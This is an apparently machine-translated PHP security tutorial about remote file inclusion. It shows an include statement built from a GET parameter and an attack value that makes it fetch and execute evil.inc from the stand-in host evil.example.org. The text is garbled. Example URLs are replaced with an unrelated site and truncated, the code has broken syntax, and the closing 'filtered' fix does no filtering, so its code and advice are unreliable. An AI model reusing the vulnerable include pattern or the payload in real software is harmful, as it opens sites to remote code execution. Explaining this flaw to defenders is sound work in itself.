PHP Security-code injection

Code injection

A particularly dangerous situation is when you try to use contaminated data as a leading part of a dynamic inclusion:

<?php   include "{$_get[' path ']}/header.inc";   ? >

In this scenario, the attacker can manipulate not just the file name, but also the contained resources. Because PHP does not only contain files by default, it can also contain the following resources (controlled by Allow_url_fopen in the configuration file):

<?php   include ' http://www.google.com/';   ? >

The include statement will include the http://www.php.cn/Web page source code as a local file. Although the above example is harmless, imagine if the source code returned by Google contains PHP code. This will cause the PHP code contained in it to be parsed and executed. This is an opportunity for attackers to release malicious code to destroy your security system.

Imagine that the value of path points to a resource under the attacker's control:

http://www.php.cn/... e.org%2fevil.inc%3f

In the example above, the value of path is URL-encoded and the original value is as follows:

http://www.php.cn/

This causes the include statement to contain and execute the script selected by the attacker (Evil.inc), while the original file name/header.inc is considered a request string:

  <?php   include "Http://evil.example.org/evil.inc?/header.inc";   ? >

This avoids the need to guess the remaining directory and file name (/HEADER.ONC) and establish the same path and file name on the evil.example.org. Conversely, in the case where the specific file name of the attacked Web site is masked, he just has to make sure that the code he wants to execute is evil.inc in the output.

This is as dangerous as allowing an attacker to modify PHP code directly on your website. Fortunately, filtering the data before the include and require statements prevents this from happening:

<?php   $clean = Array ();   /* $_get[' path '] is filtered and stored in $clean [' Path ']. */   include ' {$clean [' path ']}/header.inc ';   ? >

The above is the PHP security-code injection content, more relevant content please pay attention to topic.alibabacloud.com (www.php.cn)!

